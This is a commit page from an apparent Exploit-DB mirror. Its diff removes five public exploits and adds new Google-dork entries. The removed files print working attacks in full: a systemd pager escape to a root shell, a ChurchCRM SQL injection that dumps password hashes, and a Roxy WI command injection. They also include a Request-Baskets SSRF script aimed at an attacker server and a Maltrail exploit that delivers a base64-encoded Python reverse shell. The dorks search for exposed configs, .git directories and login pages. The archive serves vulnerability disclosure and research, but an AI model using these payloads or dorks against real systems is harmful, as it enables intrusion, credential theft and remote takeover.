bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-10-31

Browse source 
12 changes to exploits/shellcodes/ghdb

systemd 246 - Local Privilege Escalation

ChurchCRM v4.5.3 - Authenticated SQL Injection

Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute

Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)

Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
This commit is contained in:
Exploit-DB 2023-10-31 00:17:05 +00:00
parent 45020d9cc3
commit 75cbb282d9
7 changed files with 150 additions and 162 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
exploits/linux/local/51674.txt
View file

@ -1,17 +0,0 @@
# Exploit Title: systemd 246 - Local Privilege Escalation
# Exploit Author: Iyaad Luqman K (init_6)
# Application: systemd 246
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-26604
systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user.
This vulnerability allows a local attacker to gain root privileges.
## Proof Of Concept:
1. Run the systemctl command which can be run as root user.
sudo /usr/bin/systemctl status any_service
2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.
3. Type in `!/bin/sh` in the pager to spawn a shell as root user.

30
exploits/php/webapps/51397.txt
View file

@ -1,30 +0,0 @@
# Exploit Title: ChurchCRM 4.5.3 - Authenticated SQL Injection
# Date: 27-04-2023
# Exploit Author: Iyaad Luqman K
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Tested Version: 4.5.1
# Tested on: Windows, Linux
# CVE: CVE-2023-24685
ChurchCRM v4.5.3 and below was discovered to contain a SQL injection vulnerability via the Event parameter
under the Event Attendance reports module.
- After Logging in, go to
```
GET /EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CRM-7bf048c51cd7d0923f0ab3e959c3d3f6=d99fjb19f2kp081ol95remfm6d
Connection: close
```
- The response will dump the `usr_Username` and `usr_Password` from the database.
```
PerseveranceAdmin:261f4aef6877ce6c11a780ae6c13e4e2f27a8a55f69d6d6785fc787063272db4
```

24
exploits/php/webapps/51481.txt
View file

@ -1,24 +0,0 @@
# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
# Exploit Author: Iyaad Luqman K
# Application: Roxy WI <= v6.1.0.0
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31137
# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1

53
exploits/python/webapps/51675.sh
View file

@ -1,53 +0,0 @@
# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Request-Baskets v1.2.1
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-27163
# PoC
#!/bin/bash
if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
help="Usage: exploit.sh <URL> <TARGET>\n\n";
help+="Arguments:\n" \
help+=" URL main path (/) of the server (eg. http://127.0.0.1:5000/)\n";
help+=" TARGET";
echo -e "$help";
exit 1;
fi
URL=$1
ATTACKER_SERVER=$2
if [ "${URL: -1}" != "/" ]; then
URL="$URL/";
fi;
BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");
API_URL="$URL""api/baskets/$BASKET_NAME";
PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";
echo "> Creating the \"$BASKET_NAME\" proxy basket...";
if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then
echo "> FATAL: Could not properly request $API_URL. Is the server online?";
exit 1;
fi;
BASKET_URL="$URL$BASKET_NAME";
echo "> Basket created!";
echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";
if ! jq --help 1>/dev/null; then
echo "> Response body (Authorization): $response";
else
echo "> Authorization: $(echo "$response" | jq -r ".token")";
fi;
exit 0;

33
exploits/python/webapps/51676.py
View file

@ -1,33 +0,0 @@
# Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)
# Exploit Author: Iyaad Luqman K (init_6)
# Application: Maltrail v0.53
# Tested on: Ubuntu 22.04
# PoC
import sys;
import os;
import base64;
def main():
listening_IP = None
listening_PORT = None
target_URL = None
if len(sys.argv) != 4:
print("Error. Needs listening IP, PORT and target URL.")
return(-1)
listening_IP = sys.argv[1]
listening_PORT = sys.argv[2]
target_URL = sys.argv[3] + "/login"
print("Running exploit on " + str(target_URL))
curl_cmd(listening_IP, listening_PORT, target_URL)
def curl_cmd(my_ip, my_port, target_url):
payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
encoded_payload = base64.b64encode(payload.encode()).decode() # encode the payload in Base64
command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
os.system(command)
if __name__ == "__main__":
main()

5
files_exploits.csv
View file

@ -7746,7 +7746,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,,2018-01-31,2018-01-31,0,CVE-2017-18078,,,,,http://seclists.org/oss-sec/2018/q1/115
45715,exploits/linux/local/45715.txt,"systemd - 'chown_one()' Dereference Symlinks",2018-10-29,"Google Security Research",local,linux,,2018-10-29,2018-11-17,1,CVE-2018-15687,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1689
41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation",2017-01-24,"Sebastian Krahmer",local,linux,,2017-01-26,2019-03-07,0,CVE-2016-10156,,,,,http://www.openwall.com/lists/oss-security/2017/01/24/4
51674,exploits/linux/local/51674.txt,"systemd 246 - Local Privilege Escalation",2023-08-10,"Iyaad Luqman K",local,linux,,2023-08-10,2023-08-10,1,CVE-2023-26604,,,,,
15620,exploits/linux/local/15620.sh,"SystemTap - Local Privilege Escalation",2010-11-26,"Tavis Ormandy",local,linux,,2010-11-26,2010-11-26,1,CVE-2010-4170;OSVDB-69489,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-26-at-62953-am.png,,
33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",local,linux,,2010-02-05,2014-06-01,1,CVE-2010-0411;OSVDB-62131,,,,,https://www.securityfocus.com/bid/38120/info
46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
@ -15597,7 +15596,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
51397,exploits/php/webapps/51397.txt,"ChurchCRM v4.5.3 - Authenticated SQL Injection",2023-04-27,"Iyaad Luqman K",webapps,php,,2023-04-27,2023-05-07,1,CVE-2023-24685,,,,,
51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
@ -28874,7 +28872,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.4-php.zip,
46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80,2019-01-16,2019-01-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,
46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80,2019-01-07,2019-01-07,0,CVE-2018-20526;CVE-2018-20525,Traversal,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,
51481,exploits/php/webapps/51481.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute",2023-05-24,"Iyaad Luqman K",webapps,php,,2023-05-24,2023-05-24,1,CVE-2022-31137,,,,,
50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",2022-05-12,"Eren Gozaydin",webapps,php,,2022-05-12,2022-05-12,0,CVE-2022-28080,,,,,
6589,exploits/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' SQL Injection",2008-09-26,0x90,webapps,php,,2008-09-25,2016-12-23,1,OSVDB-49317;CVE-2008-4736,,,,,
6591,exploits/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,webapps,php,,2008-09-26,,1,OSVDB-57330;CVE-2008-7028,,,,,
@ -34709,7 +34706,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-09-08,1,,,,,,
40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
51276,exploits/python/webapps/51276.go,"modoboa 2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
@ -34720,7 +34716,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,,
39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,,
51675,exploits/python/webapps/51675.sh,"Request-Baskets v1.2.1 - Server-side request forgery (SSRF)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,

Can't render this file because it is too large.

150
ghdb.xml
View file

@ -32856,6 +32856,21 @@ Discovered by Rootkit Pentester.</textualDescription>
<date>2015-12-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>8287</id>
<link>https://www.exploit-db.com/ghdb/8287</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;structure&quot; + ext:sql</shortDescription>
<textualDescription># Google Dork: &quot;structure&quot; + ext:sql
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit chum1ng0</textualDescription>
<query>&quot;structure&quot; + ext:sql</query>
<querystring>https://www.google.com/search?q=&quot;structure&quot; + ext:sql</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>chum1ng0</author>
</entry>
<entry>
<id>140</id>
<link>https://www.exploit-db.com/ghdb/140</link>
@ -42212,6 +42227,21 @@ An attacker can further misuse this to conduct attacks.
<date>2020-05-04</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>8289</id>
<link>https://www.exploit-db.com/ghdb/8289</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/config/prod/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/config/prod/&quot;
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Suprit Pandurangi</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/config/prod/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/config/prod/&quot;</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Suprit Pandurangi</author>
</entry>
<entry>
<id>5957</id>
<link>https://www.exploit-db.com/ghdb/5957</link>
@ -49318,6 +49348,21 @@ code. *Dork discovered by:* Sachin Wagh (@tiger_tigerboy)
<date>2018-02-05</date>
<author>Sachin Wagh</author>
</entry>
<entry>
<id>8280</id>
<link>https://www.exploit-db.com/ghdb/8280</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of login.js</shortDescription>
<textualDescription># Google Dork: intitle:index.of login.js
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Varad Vaidya</textualDescription>
<query>intitle:index.of login.js</query>
<querystring>https://www.google.com/search?q=intitle:index.of login.js</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Varad Vaidya</author>
</entry>
<entry>
<id>7332</id>
<link>https://www.exploit-db.com/ghdb/7332</link>
@ -49532,6 +49577,21 @@ Author: Lord.TMR</textualDescription>
<date>2021-11-08</date>
<author>Vivek Pancholi</author>
</entry>
<entry>
<id>8284</id>
<link>https://www.exploit-db.com/ghdb/8284</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: .git</shortDescription>
<textualDescription># Google Dork: inurl: .git
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Jai kumar</textualDescription>
<query>New submission</query>
<querystring>https://www.google.com/search?q=New submission</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Jai kumar</author>
</entry>
<entry>
<id>7349</id>
<link>https://www.exploit-db.com/ghdb/7349</link>
@ -55745,6 +55805,21 @@ Reza Abasi(Turku)
<date>2022-06-22</date>
<author>Simone Gasparato</author>
</entry>
<entry>
<id>8281</id>
<link>https://www.exploit-db.com/ghdb/8281</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot; /mobikwike</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot; /mobikwike
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Husain Ahmad</textualDescription>
<query>site:.com intitle:&quot;index of&quot; /mobikwike</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot; /mobikwike</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Husain Ahmad</author>
</entry>
<entry>
<id>7942</id>
<link>https://www.exploit-db.com/ghdb/7942</link>
@ -55775,6 +55850,36 @@ Reza Abasi(Turku)
<date>2022-06-20</date>
<author>Chirag Lundwani</author>
</entry>
<entry>
<id>8286</id>
<link>https://www.exploit-db.com/ghdb/8286</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot;/csb</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot;/csb
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Husain Ahmad</textualDescription>
<query>site:.com intitle:&quot;index of&quot;/csb</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot;/csb</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Husain Ahmad</author>
</entry>
<entry>
<id>8285</id>
<link>https://www.exploit-db.com/ghdb/8285</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com intitle:&quot;index of&quot;/sbi</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;index of&quot;/sbi
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Husain Ahmad</textualDescription>
<query>site:.com intitle:&quot;index of&quot;/sbi</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;index of&quot;/sbi</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Husain Ahmad</author>
</entry>
<entry>
<id>8116</id>
<link>https://www.exploit-db.com/ghdb/8116</link>
@ -55790,6 +55895,21 @@ Reza Abasi(Turku)
<date>2023-03-16</date>
<author>PRINCY M JOSE</author>
</entry>
<entry>
<id>8282</id>
<link>https://www.exploit-db.com/ghdb/8282</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:.com inurl:/pass-aspx.</shortDescription>
<textualDescription># Google Dork: site:.com inurl:/pass-aspx.
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit swara kalsekar</textualDescription>
<query>Submiting a google dork.</query>
<querystring>https://www.google.com/search?q=Submiting a google dork.</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>swara kalsekar</author>
</entry>
<entry>
<id>8258</id>
<link>https://www.exploit-db.com/ghdb/8258</link>
@ -80463,6 +80583,21 @@ inurl:&quot;/libs/granite/core/content/login.html&quot;
<date>2023-06-02</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>8283</id>
<link>https://www.exploit-db.com/ghdb/8283</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login.aspx&quot; intitle:&quot;pass&quot;.</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/login.aspx&quot; intitle:&quot;pass&quot;.
# Pages Containing Login Portals
# Date: 30/10/2023
# Exploit swara kalsekar</textualDescription>
<query>Submitting a google dork.</query>
<querystring>https://www.google.com/search?q=Submitting a google dork.</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>swara kalsekar</author>
</entry>
<entry>
<id>8208</id>
<link>https://www.exploit-db.com/ghdb/8208</link>
@ -91682,6 +91817,21 @@ site:&quot;.atlassian.net&quot; / &quot;service desk/customer/user/login&quot;</
<date>2020-04-21</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>8288</id>
<link>https://www.exploit-db.com/ghdb/8288</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:..us inurl:&quot;login.php&quot;</shortDescription>
<textualDescription># Google Dork: site:..us inurl:&quot;login.php&quot;
# Pages Containing Login Portals
# Date: 30/10/2023
# Exploit Husain Ahmad</textualDescription>
<query>site:..us inurl:&quot;login.php&quot;</query>
<querystring>https://www.google.com/search?q=site:..us inurl:&quot;login.php&quot;</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Husain Ahmad</author>
</entry>
<entry>
<id>7501</id>
<link>https://www.exploit-db.com/ghdb/7501</link>